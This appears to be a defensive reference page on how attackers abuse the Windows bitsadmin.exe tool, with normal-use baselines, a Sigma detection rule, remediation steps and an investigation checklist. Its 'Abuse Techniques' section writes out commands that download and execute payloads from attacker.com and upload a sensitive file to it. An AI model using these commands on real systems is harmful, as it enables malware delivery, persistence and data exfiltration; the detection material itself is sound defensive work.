bitsadmin.exeSYSTEM UTILITYbitsadmin.exe - BITS Admin LOLBin Security Analysis
bitsadmin.exe is the Background Intelligent Transfer Service command-line tool and a notorious LOLBin. Attackers abuse it for stealthy file downloads that persist across reboots, execution of downloaded payloads, and data exfiltration. BITS jobs are difficult to detect and survive system restarts.
Risk Summary
CRITICAL priority for SOC triage. bitsadmin.exe is a top-tier LOLBin for persistent downloads and execution. Any /transfer, /create, or /addfile commands require **immediate investigation**. BITS jobs persist across reboots making this particularly dangerous.
Overview
What is bitsadmin.exe?
bitsadmin.exe manages Windows Background Intelligent Transfer Service (BITS) jobs.
Legitimate Functions
BITS Management:
- Download Windows updates
- Transfer large files
- Resume interrupted downloads
- Background throttled transfers
Why It's Dangerous
LOLBin Capabilities:
- Stealthy file downloads
- Persistence across reboots
- Execute downloaded files
- Difficult to detect
Security Significance
- Trusted Binary: Signed Microsoft tool
- Persistence: Jobs survive restarts
- Evasion: Traffic appears as BITS
- Execution: Can run downloaded files
Normal Behavior
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\bitsadmin.exe |
| Parent | cmd.exe, powershell.exe (admin) |
| User | Administrator |
| Context | Windows Update operations |
Legitimate Usage
:: Check BITS jobs (legitimate)
bitsadmin /list /allusers
:: Windows Update context only
Frequency
Direct bitsadmin usage is rare - Windows typically uses PowerShell or API.
Common Locations
C:\Windows\System32\bitsadmin.exeC:\Windows\SysWOW64\bitsadmin.exeSuspicious Indicators
Legitimate vs Suspicious
LEGITIMATE (Very Rare)
Command: bitsadmin /list
bitsadmin /info
Context: System administration
Frequency: Rare
SUSPICIOUS (High Confidence)
Command: bitsadmin /transfer /download http://...
bitsadmin /create /addfile /resume
bitsadmin /SetNotifyCmdLine
Context: Any non-IT user
Frequency: Any
Dangerous Parameters
| Parameter | Risk | Description |
|---|---|---|
| /transfer | CRITICAL | Download file |
| /addfile | CRITICAL | Add file to job |
| /SetNotifyCmdLine | CRITICAL | Execute on completion |
| /resume | HIGH | Start download |
| /create | HIGH | Create new job |
Abuse Techniques
Attack Techniques
Technique #1: File Download (T1197)
Download Malware via BITS:
bitsadmin /transfer job /download /priority high http://attacker.com/mal.exe C:\mal.exe
Persistent Download Job:
bitsadmin /create downloadjob
bitsadmin /addfile downloadjob http://attacker.com/payload.exe C:\payload.exe
bitsadmin /resume downloadjob
bitsadmin /complete downloadjob
Technique #2: Execute After Download (T1059)
bitsadmin /SetNotifyCmdLine job C:\payload.exe
bitsadmin /resume job
Technique #3: Persistence (T1197)
BITS jobs persist across reboots - malware can create job that downloads and executes on every startup.
Technique #4: Data Exfiltration (T1048)
bitsadmin /transfer exfil /upload http://attacker.com/upload C:\sensitive.zip
Detection Guidance
Detection Strategies
Priority #1: Any Download Command (CRITICAL)
Sigma Rule:
title: Bitsadmin Download
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\bitsadmin.exe'
CommandLine|contains:
- '/transfer'
- '/addfile'
- 'http'
condition: selection
level: critical
Priority #2: Execution Setup
Process = "bitsadmin.exe" AND
CommandLine CONTAINS "/SetNotifyCmdLine"
→ ALERT: CRITICAL - Execution on download completion
Priority #3: List All Jobs
bitsadmin /list /allusers /verbose
# Review for suspicious jobs
Priority #4: PowerShell Alternative
Get-BitsTransfer -AllUsers | Where-Object {
$_.TransferType -eq 'Download' -and
$_.JobState -ne 'Transferred'
} | Format-List
Remediation Steps
Protection and Remediation
Defense: Monitor BITS Jobs
# Scheduled task to audit BITS
Get-BitsTransfer -AllUsers | Export-Csv "bits_audit.csv"
Defense: Application Control
Restrict bitsadmin.exe to administrators.
If Compromise Suspected
- List all BITS jobs
- Cancel suspicious jobs
- Identify downloaded files
- Trace execution chain
- Remove persistence
bitsadmin /cancel <job>
bitsadmin /reset /allusers
Investigation Checklist
Investigation Checklist
- List all BITS jobs with /list /allusers
- Review job URLs and destinations
- Check for /SetNotifyCmdLine
- Identify downloaded files
- Check if downloads executed
- Review command line history
- Cancel malicious jobs
- Hunt for persistence